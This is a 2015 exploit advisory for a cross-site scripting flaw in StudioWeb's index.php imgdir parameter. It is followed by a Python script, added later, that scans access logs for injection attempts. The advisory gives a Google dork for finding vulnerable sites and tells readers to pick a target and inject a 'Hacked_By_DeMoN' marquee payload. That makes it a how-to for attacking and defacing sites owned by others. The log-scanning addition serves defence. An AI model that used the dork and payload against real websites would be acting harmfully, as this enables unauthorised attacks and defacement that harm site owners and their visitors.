########################################################
# Exploit Title: StudioWeb / Cross-Site Scripting (XSS)
########################################################
# Google Dork: inurl:"poto" intext:"powered by StudioWeb "
# You Can Make Another Dork For This Bug
# Date: [15/11/2015]
# Exploit Author: Guardiran Security Team =>DeMoN
# Vendor Homepage: [http://www.studioweb.com/]
# Software Link: [-]
# Version: All Versions
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DESCRIPTION: Hello Guys.
# These Sites Have An XSS (Cross-Site Scripting) Bug.
# Please Enter The Dork In Google And Open Your Target.
# Then Add This Script
# ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>]
# In The Target After This Section
# [index.php?imgdir=]
# Then You Will See That Your Script Worked.
# GooD LucK
########################################################
# Demo:
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN
########################################################
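# Added example, not part of the original advisory: a log check a site operator can run to find requests that put HTML markup into the imgdir parameter of index.php.
# It assumes combined-format access logs; the function names and the sample log lines (example paths, documentation IP addresses) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Characters that let a value break out of an HTML attribute or open a tag.
HTML_META = re.compile(r'[<>"\']')
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def imgdir_values(log_line):
    """Return the decoded imgdir values found in one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    parts = urlsplit(match.group(1))
    if not parts.path.endswith("/index.php"):
        return []
    values = parse_qs(parts.query, keep_blank_values=True).get("imgdir", [])
    # parse_qs decodes once; decode again so double-encoded input
    # such as %253C is inspected in its final form as well.
    return [unquote(v) for v in values]


def is_injection_attempt(log_line):
    """True when any imgdir value carries HTML metacharacters."""
    return any(HTML_META.search(v) for v in imgdir_values(log_line))


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Nov/2015:10:01:12 +0000] "GET /poto/index.php'
    '?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3Etest%3C/h1%3E%3C/marquee%3E HTTP/1.1" 200 5120',
    '198.51.100.4 - - [15/Nov/2015:10:02:40 +0000] "GET /poto/index.php'
    '?imgdir=gallery/2015 HTTP/1.1" 200 4811',
    '203.0.113.7 - - [15/Nov/2015:10:03:05 +0000] "GET /poto/index.php'
    '?imgdir=%2522%253E%253Cmarquee%253E HTTP/1.1" 200 5090',
    '198.51.100.4 - - [15/Nov/2015:10:03:30 +0000] "GET /poto/style.css HTTP/1.1" 200 912',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        if is_injection_attempt(line):
            print("suspicious:", line.split()[0], imgdir_values(line))
```

# A directory name that legitimately contains a quote character would also be flagged, so review hits before acting on them.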